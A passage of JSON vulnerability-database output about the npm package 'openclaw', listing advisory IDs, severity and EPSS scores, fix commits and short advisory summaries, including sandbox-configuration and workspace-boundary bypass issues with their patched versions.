vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability"
:"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability"
:"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability"
:"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability"
:"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability"
:"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-7h7g-x2px-94hj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mkka-hf2q-pfhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91571?format=json","vulnerability_id":"VCID-mqzw-sq85-9ba2","summary":"Duplicate Advisory: OpenClaw has an improper sandbox configuration vulnerability\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate 
of GHSA-43x4-g22p-3hrq. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.21 contain an improper sandbox configuration vulnerability that allows attackers to execute arbitrary code by exploiting renderer-side vulnerabilities without requiring a sandbox escape. Attackers can leverage the disabled OS-level sandbox protections in the Chromium browser container to achieve code execution on the host system.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1835dec2004fe7a62c6a7ba46b8485f124ec6199","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1835dec2004fe7a62c6a7ba46b8485f124ec6199"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e7eba01efc4c3c400e9cfd3ce3d661cbc788a631","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e7eba01efc4c3c400e9cfd3ce3d661cbc788a631"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-os-level-sandbox-bypass-via-no-sandbox-flag","reference_id":"","reference_type":"","scores":[{"value
":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-os-level-sandbox-bypass-via-no-sandbox-flag"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32046","reference_id":"CVE-2026-32046","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32046"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-43x4-g22p-3hrq","reference_id":"GHSA-43x4-g22p-3hrq","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-43x4-g22p-3hrq"},{"reference_url":"https://github.com/advisories/GHSA-q94v-v6m9-jhq9","reference_id":"GHSA-q94v-v6m9-jhq9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scor
ing_elements":""}],"url":"https://github.com/advisories/GHSA-q94v-v6m9-jhq9"}],"fixed_packages":[],"aliases":["GHSA-q94v-v6m9-jhq9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mqzw-sq85-9ba2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89450?format=json","vulnerability_id":"VCID-mszk-dr24-xugw","summary":"OpenClaw: screen_record outPath bypassed workspace-only filesystem guard\n## Summary\n\nscreen_record outPath bypassed workspace-only filesystem guard.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe node-host screen recording tool could honor an `outPath` outside the workspace guard, allowing an authorized tool call to write outside the intended workspace boundary.\n\n## Technical Details\n\nThe fix applies the workspace-root guard to node tool `outPath` handling, including screen recording paths.\n\n## Fix\n\nThe issue was fixed in #63551. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `635bb35b68d8faa5bfa2fda35feadd315122748a`\n- PR: #63551\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43567","reference_id":"","reference_type":"","scores":[{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08891","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10398","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.1044","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43567"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"}],"url":"https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63551","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":
"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63551"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jf25-7968-h2h5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43567","reference_id":"CVE-2026-43567","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43567"},{"reference_url":"https://github.com/advisories/GHSA-jf25-7968-h2h5","reference_id":"GHSA-jf25-7968-h2h5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jf25-7968-h2h5"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter","reference_id":"openclaw-path-traversal-in-screen-record-outpath-parameter","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Trac
k","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:49:42Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-in-screen-record-outpath-parameter"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulne
rability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43567","GHSA-jf25-7968-h2h5"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mszk-dr24-xugw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90208?format=json","vulnerability_id":"VCID-mv8b-cryt-u3g8","summary":"OpenClaw: Feishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix)\n## Impact\n\nFeishu docx upload_file/upload_image Bypasses Workspace-Only Filesystem Policy (GHSA-qf48-qfv4-jjm9 Incomplete Fix).\n\nFeishu document uploads could read local files outside the workspace-only file policy when processing docx upload blocks.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.3`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Rosayxy for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41911","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19277","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19229","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19273","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41911"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5fc7-f62m-8983","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N